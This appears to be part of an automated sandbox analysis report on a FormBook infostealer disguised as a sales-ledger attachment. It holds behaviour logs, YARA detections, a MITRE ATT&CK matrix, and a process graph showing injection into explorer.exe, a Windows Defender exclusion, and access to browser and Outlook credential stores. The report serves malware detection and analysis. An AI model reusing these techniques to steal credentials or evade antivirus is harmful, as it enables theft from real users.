                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,9_2_0040A272
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected FormBookShow sources
                  Source: Yara matchFile source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                  Remote Access Functionality:

                  barindex
                  Yara detected FormBookShow sources
                  Source: Yara matchFile source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsShared Modules1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information1Credential API Hooking1System Information Discovery114Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsService Execution2Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information4Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Windows Service1Software Packing13NTDSSecurity Software Discovery331Distributed Component Object ModelCredential API Hooking1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptProcess Injection512Rootkit1LSA SecretsVirtualization/Sandbox Evasion41SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion41DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection512/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385451 Sample: Require your Sales Ledger f... Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 57 www.soretyje.com 2->57 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 13 other signatures 2->67 10 Require your Sales Ledger from 01-April-2020.exe 6 2->10         started        signatures3 process4 file5 49 Require your Sales...m 01-April-2020.exe, PE32 10->49 dropped 51 Require your Sales...exe:Zone.Identifier, ASCII 10->51 dropped 53 Require your Sales...-April-2020.exe.log, ASCII 10->53 dropped 55 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 10->55 dropped 81 Adds a directory exclusion to Windows Defender 10->81 14 Require your Sales Ledger from 01-April-2020.exe 10->14         started        17 AdvancedRun.exe 1 10->17         started        19 powershell.exe 26 10->19         started        21 AdvancedRun.exe 1 10->21         started        signatures6 process7 signatures8 83 Modifies the context of a thread in another process (thread injection) 14->83 85 Maps a DLL or memory area into another process 14->85 87 Sample uses process hollowing technique 14->87 89 Queues an APC in another process (thread injection) 14->89 23 explorer.exe 14->23 injected 27 AdvancedRun.exe 17->27         started        29 conhost.exe 17->29         started        31 conhost.exe 19->31         started        33 AdvancedRun.exe 21->33         started        process9 dnsIp10 59 www.seniorlivingcaelderly.com 185.53.179.90, 49737, 49738, 49739 TEAMINTERNET-ASDE Germany 23->59 77 System process connects to network (likely due to code injection or exploit) 23->77 35 cmmon32.exe 23->35         started        signatures11 process12 file13 43 C:\Users\user\AppData\...\28Llogrv.ini, data 35->43 dropped 45 C:\Users\user\AppData\...\28Llogri.ini, data 35->45 dropped 69 Detected FormBook malware 35->69 71 Tries to steal Mail credentials (via file access) 35->71 73 Tries to harvest and steal browser information (history, passwords, etc) 35->73 75 3 other signatures 35->75 39 cmd.exe 35->39         started        signatures14 process15 file16 47 C:\Users\user\AppData\Local\Temp\DB1, SQLite 39->47 dropped 79 Tries to harvest and steal browser information (history, passwords, etc) 39->79 signatures17

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Require your Sales Ledger from 01-April-2020.exe29%ReversingLabsByteCode-MSIL.Trojan.Wacatac
                  Require your Sales Ledger from 01-April-2020.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
